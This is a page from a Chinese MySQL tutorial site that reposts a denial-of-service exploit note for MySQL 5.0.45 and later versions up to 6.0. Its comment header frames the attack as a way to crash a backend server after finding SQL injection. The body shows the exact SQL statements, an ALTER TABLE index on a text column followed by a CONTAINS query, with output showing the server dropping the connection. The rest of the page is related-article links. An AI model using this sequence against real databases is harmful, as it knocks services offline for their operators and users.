mysql 5.0.45 (修改)拒绝服务漏洞
/*
* MySQL <=6.0 possibly affected
* Kristian Erik Hermansen
* Credit: Joe Gallo
* You must have Alter permissions to exploit this bug!
* Scenario: You found SQL injection, but you want to punch backend server
* in the nuts just for fun. Start with the Alter TABLE statement on
* a table and field you know to exist. The first two SQL statements are
* simply to demostrate reproducibility...
*/
<snip>
mysql> Create TABLE `test` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY,
`foo` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
Query OK, 0 rows affected
mysql> Select * FROM test Where CONTAINS(foo, ''bar'');
Empty set
mysql> Alter TABLE test ADD INDEX (foo(100));
Query OK, 0 rows affected
Records: 0 Duplicates: 0 Warnings: 0
mysql> Select * FROM test Where CONTAINS(foo, ''bar'');
ERROR 2013 : Lost connection to MySQL server during query
</snip>
mysql 5.0.45 (修改)拒绝服务漏洞
2019-11-08 15:22mysql教程网 Mysql
mysql 5.0.45 (修改)拒绝服务漏洞的方法,追求安全的朋友可以参考下。
延伸 · 阅读
- 2019-11-08MySQL 数据库常用命令 简单超级实用版
- 2019-11-08winxp 安装MYSQL 出现Error 1045 access denied 的解决方法
- 2019-11-08mysql与mysqli的区别与用法说明
- 2019-11-08Linux下安装Mysql多实例作为数据备份服务器实现多
- 2019-11-08用Jena将本体文件存入MySQL数据库的实现方法
- 2019-11-08MySQL 随机查询数据与随机更新数据实现代码
精彩推荐
- Mysql
mysql三张表连接建立视图
本篇文章给大家分享了mysql三张表连接建立视图的相关知识点,有需要的朋友可以参考下。...
- Mysql
Mysql实现增量恢复的方法详解
本文给大家分享的是如何实现mysql增量恢复的场景以及具体实现方法,有需要的小伙伴可以参考下...
- Mysql
Mysql LONGTEXT 类型存储大文件(二进制也可以) (修改+调试+整理)
MySql2.cpp : Defines the entry point for the console application. ...
- Mysql
mysql5.7.23版本安装教程及配置方法
这篇文章主要介绍了mysql5.7.23版本安装教程及配置方法,需要的朋友可以参考下...
- Mysql
MySQL SQL 语法参考
MySQL SQL 语法参考...
- Mysql
mysql 8.0.11 压缩包版安装配置方法图文教程
这篇文章主要为大家详细介绍了mysql 8.0.11 压缩包版安装配置方法图文教程,具有一定的参考价值,感兴趣的小伙伴们可以参考一下...
- Mysql
详解mysql中的concat相关函数
这篇文章主要介绍了mysql中的concat相关函数,本文给大家介绍的非常详细,具有一定的参考借鉴价值,需要的朋友可以参考下...
- Mysql
关于JDBC与MySQL临时表空间的深入解析
这篇文章主要给大家介绍了关于JDBC与MySQL临时表空间的相关资料,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需...